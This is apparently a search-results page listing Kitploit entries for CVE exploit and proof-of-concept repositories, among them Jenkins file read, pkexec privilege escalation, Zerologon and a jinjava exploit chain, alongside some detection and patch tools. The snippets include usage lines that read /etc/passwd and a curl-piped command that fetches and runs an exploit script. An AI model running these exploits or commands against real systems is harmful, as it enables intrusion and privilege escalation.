Lucene search
+L

1301331 matches found

Kitploit
Kitploit
added 2026/09/03 1:22 a.m.5 views

CVE-2024-23897-Jenkins-4.441

CVE-2024-23897 - Fuga de archivos arbitrarios en Jenkins Compilación root@kitploit: g++ CVE-2024-23897.cpp -o exploit Uso root@kitploit: /exploit -u http://10.10.10.10 -f /etc/passwd...

9.8CVSS7.3AI score0.99999EPSS
SaveExploits50
Kitploit
Kitploit
added 2026/09/03 1:22 a.m.6 views

vuln4japi

vuln4japi A vulnerable Java based REST API for demonstrating CVE-2021-44228 log4shell. Motivation Log4Shell took the internet by storm in early December 2021. A Zero Day vulnerability in the Apache Log4j logging library, capable of Remote Code Execution RCE that had organizations across the globe...

10CVSS7AI score0.99999EPSS
SaveExploits367
Kitploit
Kitploit
added 2026/09/03 1:22 a.m.3 views

CVE-2021-4034

CVE-2021-4034 Una prueba de concepto simple para CVE-2021-4034 escalada de privilegios local en pkexec. Basada en el excelente resumen de nuestros amigos de Qualsys. ¿Cómo se hace? 1. Clona este repositorio en una máquina con una versión vulnerable de pkexec. 2. ./run.sh 3. Travesuras...

7.8CVSS6.9AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/03 1:22 a.m.7 views

cpanel-forensics

cPanel/WHM Forensics after CVE-2026-41940 Bash script for checking a server after the CVE-2026-41940 vulnerability CVSS 9.8. For 64 days attackers had root access without a password — the patch does not remove what has already been planted inside. Usage root@kitploit: sudo bash cpanelforensics.sh...

9.8CVSS7.4AI score0.98527EPSS
SaveExploits74
Kitploit
Kitploit
added 2026/09/03 1:22 a.m.3 views

COPY-FAIL-Detection-with-Wazuh-4.14.4

COPY FAIL Detection with Wazuh 4.14.4 - CVE-2026-31431 Detection engineering for the Copy Fail kernel LPE · Ubuntu / RHEL / SUSE / Amazon Linux 2023 / Kali What is Copy Fail? CVE-2026-31431 is a logic bug in the Linux kernel's authencesn cryptographic template. It allows any unprivileged local us...

7.8CVSS6.4AI score0.99907EPSS
SaveExploits239
Kitploit
Kitploit
added 2026/09/03 1:21 a.m.4 views

Security-CVE-2026-41940-cPanel-WHM-WP2

Este repositorio no tiene un README...

9.8CVSS7.4AI score0.98527EPSS
SaveExploits74
Kitploit
Kitploit
added 2026/09/03 1:21 a.m.7 views

zer0dump

Zer0Dump Zer0dump 是一个概念验证漏洞利用/工具,用于滥用与 CVE-2020-1472(Zerologon)相关的漏洞,以对未打补丁的 Windows 域控制器发起完全系统接管。 特别感谢 @dirkjanm 和 @SecureAuthCorp...

10CVSS6.9AI score0.99512EPSS
SaveExploits76References2
Kitploit
Kitploit
added 2026/09/03 1:21 a.m.7 views

cve-2026-41679

CVE-2026-41679 Introducción Este POC comprueba si una instancia de paperclip ai es vulnerable a CVE-2026-41679. Sigue los pasos que se encuentran en este artículo. Uso Ejecuta los siguientes comandos: root@kitploit: git clone [email protected]:bartfroklage/cve-2026-41679.git cd cve-2026-4167...

10CVSS6AI score0.04673EPSS
SaveExploits5References1
Kitploit
Kitploit
added 2026/09/03 1:21 a.m.8 views

CVE-2025-8760

Prueba de Concepto para CVE-2025-8760 El análisis detallado está disponible aquí...

10CVSS7.3AI score0.00757EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/03 1:21 a.m.6 views

dirtyfrag-patches

Dirty Frag — Parches del Kernel Serie de parches para la clase de vulnerabilidad Dirty Frag descubierta por Hyunwoo Kim @v4bel. Dirty Frag permite a un usuario local sin privilegios sobrescribir bytes arbitrarios de la caché de páginas de archivos de solo lectura p. ej. /usr/bin/su, /etc/passwd, ...

8.8CVSS6.9AI score0.93235EPSS
SaveExploits34References1
Kitploit
Kitploit
added 2026/09/03 1:21 a.m.4 views

CVE-2021-3156

CVE-2021-3156 Exploit for CVE-2021-3156...

7.8CVSS7AI score0.99969EPSS
SaveExploits83
Kitploit
Kitploit
added 2026/09/03 1:21 a.m.4 views

CVE-2021-4034

CVE-2021-4034 CVE-2021-4034 en Script Bash Uso: source curl -s https://raw.githubusercontent.com/azminawwar/CVE-2021-4034/main/exploit.sh...

7.8CVSS6.9AI score0.94921EPSS
SaveExploits154References1
Kitploit
Kitploit
added 2026/09/03 1:20 a.m.7 views

CVE-2024-49113-Checker

CVE-2024-49113-Checker Script to test whether your environment is potentially vulnerable to CVE-2024-49113 LDAP Nightmare. This script performs: RPC connectivity checks LDAP port tests Netlogon service validation LDAP callback verification root@kitploit: usage : python CVE-2024-49113-checker.py...

7.5CVSS7.3AI score0.82992EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/03 1:20 a.m.5 views

ResourcePoison

Fix for this issue has appeared as CVE-2025-22441: bulletin patch follow up Passing ApplicationInfo around ApplicationInfo is structure defining various information about installed app, most notably path to apk file from which resources and code are loaded Usually it is passed from system to...

7.3CVSS7.3AI score0.00109EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/03 1:20 a.m.5 views

CVE-2021-4034

CVE-2021-4034 This is an exploit created for CVE-2021-4034 meant as a POC. It is based off the info at https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt. How to use it: Download the exploit folder. Compile prog.c with gcc prog.c Go to the GCONVPATH=. folder and ensure that the "code" fil...

7.8CVSS6.9AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/03 1:20 a.m.5 views

OrganizerTransaction

This is PoC for CVE-2021-39749, which allows starting activities of other apps on Android 12L Beta regardless of their permission and exported settings In Android 12L TaskFragmentOrganizer access intentionally no longer requires MANAGEACTIVITYTASKS permission Using app provided here requires...

7.8CVSS7.1AI score0.00205EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/03 1:20 a.m.4 views

CopyFail-Patcher

Patcher script for CVE-2026-31431 This repo provide script for the CopyFail vulnerability, for Debian/Ubuntu/RHEL/Fedora, didn't test on other distros but anyway... Just follow these : root@kitploit: $ git clone https://github.com/mhdgning131/CopyFail-Patcher.git $ cd CopyFail-Patcher $ chmod +x...

7.8CVSS6.4AI score0.99907EPSS
SaveExploits239
Kitploit
Kitploit
added 2026/09/03 1:20 a.m.6 views

desc_race_A15

descraceA15 CVE-2021-30955 iOS 15.1.1 POC for 6GB RAM devices A14-A15 Made with SwiftUI and C Based off of @b1n4r1b01's exploit Write-up of @realBrightiup's POC Improves A14-A15 support Tested on iPhone 13 Pro Max Results Achieves write privileges Panic's immediately due to A12+ generates logs in...

7.6CVSS7.2AI score0.046EPSS
SaveExploits5
Kitploit
Kitploit
added 2026/09/03 1:20 a.m.6 views

CVE-2026-26801-pdfmake-ssrf

PoC de Vulnerabilidad SSRF en pdfmake Resumen de la Vulnerabilidad...

7.5CVSS5.8AI score0.00481EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/03 1:19 a.m.6 views

jinjava-cve-2026-25526-poc

Exploit paso a paso los 9 pasos: mvn exec:java -Dexec.mainClass=ExploitHarness -q 2. Cadenas de exploit finales creación de archivos, lectura de archivos, divulgación de información: mvn exec:java -Dexec.mainClass=ExploitFinal -q 3. Exfiltración de contenido de archivos lee /etc/passwd,...

9.8CVSS7.2AI score0.00889EPSS
SaveExploits1References1
Rows per page
Query Builder